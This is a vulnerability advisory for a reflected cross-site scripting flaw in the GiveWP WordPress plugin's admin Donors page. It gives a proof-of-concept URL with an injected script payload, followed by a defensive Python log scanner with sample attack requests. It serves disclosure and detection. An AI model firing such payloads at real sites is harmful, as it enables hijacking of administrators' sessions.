WordPress Plugin Vulnerabilities
GiveWP < 2.10.0 - Reflected Cross Site Scripting (XSS)
Description
The plugin was affected by a reflected Cross-Site Scripting vulnerability in the administration panel, via the 's' GET parameter on the Donors page.
Proof of Concept
https://example.com/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors
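A detection check for the request shape described above, added here as an example and not part of the original advisory: it flags access-log entries for `/wp-admin/edit.php` with `page=give-donors` whose `s` value contains markup characters after decoding. The log lines are constructed samples in combined log format, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that close an HTML attribute or open a tag (the PoC starts with ">).
MARKUP_RE = re.compile(r'[<>"]')

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Mar/2021:10:00:00 +0000] "GET /wp-admin/edit.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&post_type=give_forms&page=give-donors&view=donors HTTP/1.1" 200 5120',
    '203.0.113.7 - - [23/Mar/2021:10:00:05 +0000] "GET /wp-admin/edit.php?s=jane+doe&post_type=give_forms&page=give-donors HTTP/1.1" 200 4980',
    '203.0.113.9 - - [23/Mar/2021:10:01:00 +0000] "GET /wp-admin/edit.php?s=%2522%253E&post_type=give_forms&page=give-donors HTTP/1.1" 200 4990',
    '203.0.113.9 - - [23/Mar/2021:10:02:00 +0000] "GET /wp-admin/edit.php?s=%3Cb%3E&post_type=post HTTP/1.1" 200 3000',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %2522) up to max_rounds times."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_donor_search(log_line):
    """Return the decoded 's' value of a flagged Donors-page request, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # decodes once
    if not url.path.endswith("/wp-admin/edit.php") or "give-donors" not in params.get("page", []):
        return None
    for raw in params.get("s", []):
        term = fully_decode(raw)
        if MARKUP_RE.search(term):
            return term
    return None

def scan(lines):
    """Return (line_number, decoded_term) for every flagged entry."""
    hits = [(n, suspicious_donor_search(line)) for n, line in enumerate(lines, 1)]
    return [(n, term) for n, term in hits if term is not None]

if __name__ == "__main__":
    for n, term in scan(SAMPLE_LOG):
        print(f"line {n}: suspicious donor search term {term!r}")
```

Legitimate donor searches that contain a double quote or angle bracket will also be flagged, so treat hits as leads for review rather than confirmed attempts.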
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Austin Bentley
Submitter
Austin Bentley
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-23
Added
2021-03-23
Last Updated
2021-03-24